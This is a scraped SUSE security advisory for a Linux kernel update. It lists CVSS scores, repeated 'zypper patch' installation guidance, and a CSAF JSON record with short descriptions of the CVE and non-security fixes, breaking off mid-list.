To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThe SUSE Linux Enterprise 16.0 and SL MIxro 6.2 kernel was updated to fix various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-40147: blk-throttle: fix access race during throttle policy activation (bsc#1253344).\n- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).\n- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).\n- CVE-2025-40261: nvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).\n- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).\n- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).\n- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).\n- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).\n- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).\n- CVE-2025-68211: ksm: use range-walk function to jump over holes in scan_get_next_rmap_item (bsc#1255319).\n- CVE-2025-68218: nvme-multipath: fix lockdep WARN due to partition scan work (bsc#1255245).\n- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).\n- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).\n- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).\n- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).\n- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).\n- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).\n- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).\n- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).\n- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).\n- CVE-2025-68341: veth: reduce XDP no_direct return section to fix race (bsc#1255506).\n- CVE-2025-68348: block: fix memory leak in __blkdev_issue_zero_pages (bsc#1255694).\n- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).\n- CVE-2025-68356: gfs2: Prevent recursive memory reclaim (bsc#1255593).\n- CVE-2025-68359: btrfs: fix double free of qgroup record after failure to add delayed ref head (bsc#1255542).\n- CVE-2025-68360: wifi: mt76: wed: use proper wed reference in mt76 wed driver callabacks (bsc#1255536).\n- CVE-2025-68361: erofs: limit the level of fs stacking for file-backed mounts (bsc#1255526).\n- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).\n- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).\n- CVE-2025-68368: md: init bioset in mddev_init (bsc#1255527).\n- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).\n- CVE-2025-68374: md: fix rcu protection in md_wakeup_thread (bsc#1255530).\n- CVE-2025-68376: coresight: ETR: Fix ETR buffer use-after-free issue (bsc#1255529).\n- CVE-2025-68379: RDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure (bsc#1255695).\n- CVE-2025-68735: drm/panthor: Prevent potential UAF in group creation (bsc#1255811).\n- CVE-2025-68741: scsi: qla2xxx: Fix improper freeing of purex item (bsc#1255703).\n- CVE-2025-68743: mshv: Fix create memory region overlap check (bsc#1255708).\n- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).\n- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).\n- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).\n- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).\n- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).\n- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).\n- CVE-2025-68784: xfs: fix a UAF problem in xattr repair (bsc#1256793).\n- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).\n- CVE-2025-68792: tpm2-sessions: Fix out of range indexing in name_size (bsc#1256656).\n- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).\n- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).\n- CVE-2025-68799: caif: fix integer underflow in cffrml_receive() (bsc#1256643).\n- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).\n- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).\n- CVE-2025-68803: NFSD: NFSv4 file creation neglects setting ACL (bsc#1256770).\n- CVE-2025-68811: svcrdma: use rc_pageoff for memcpy byte offset (bsc#1256677).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).\n- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).\n- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).\n- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).\n- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).\n- CVE-2025-68821: fuse: fix readahead reclaim deadlock (bsc#1256667).\n- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).\n- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).\n- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).\n- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).\n- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).\n- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).\n- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).\n- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).\n- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).\n- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).\n- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).\n- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).\n- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).\n- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).\n- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).\n- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).\n- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).\n- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).\n- CVE-2025-71126: mptcp: avoid deadlock on fallback while reinjecting (bsc#1256755).\n- CVE-2025-71132: smc91x: fix broken irq-context in PREEMPT_RT (bsc#1256737).\n- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).\n- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).\n- CVE-2025-71137: octeontx2-pf: fix \"UBSAN: shift-out-of-bounds error\" (bsc#1256760).\n- CVE-2025-71148: net/handshake: restore destructor on submit failure (bsc#1257159).\n- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).\n- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).\n- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).\n- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).\n- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).\n- CVE-2026-22981: idpf: detach and close netdevs while handling a reset (bsc#1257225).\n- CVE-2026-22982: net: mscc: ocelot: Fix crash when adding interface under a lag (bsc#1257179).\n- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).\n- CVE-2026-22986: gpiolib: fix race condition for gdev-\u003esrcu (bsc#1257276).\n- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).\n- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).\n- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).\n- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).\n- CVE-2026-22996: net/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv.\n- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).\n- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).\n- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).\n- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).\n- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).\n\nThe following non security issues were fixed:\n\n- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).\n- Add bugnumber to an existing hv_netvsc change (bsc#1257473).\n- Fix locking issue introduced by a CVE backport (bsc#1256975 bsc#1254977).\n- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)\n- arm64: Update config files. Disable DEVPORT (bsc#1256792)\n- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).\n- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).\n- btrfs: pass fs_info to btrfs_delete_ref_head() (git-fixes).\n- btrfs: scrub: always update btrfs_scrub_progress::last_physical (git-fixes).\n- bus: fsl-mc: Constify fsl_mc_device_match() (jsc#PED-10906 git-fixes).\n- drm/imagination: Wait for FW trace update command completion (git-fixes).\n- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).\n- ice: use netif_get_num_default_rss_queues() (bsc#1247712).\n- libbpf: Fix -Wdiscarded-qualifiers under C23 (bsc#1257309).\n- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).\n- net: mana: Fix incorrect speed reported by debugfs (bsc#1255232).\n- net: mana: Support HW link state events (bsc#1253049).\n- nfsd: adjust WARN_ON_ONCE in revoke_delegation (bsc#1257015).\n- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).\n- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).\n- sched/fair: Disable scheduler feature NEXT_BUDDY (bsc#1255459).\n- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256864).\n- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256864).\n- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256865 bsc#1256867 jsc#PED-14156).\n- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).\n- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).\n- slimbus: core: Constify slim_eaddr_equal() (jsc#PED-10906 git-fixes).\n- smb: client: split cached_fid bitfields to avoid shared-byte 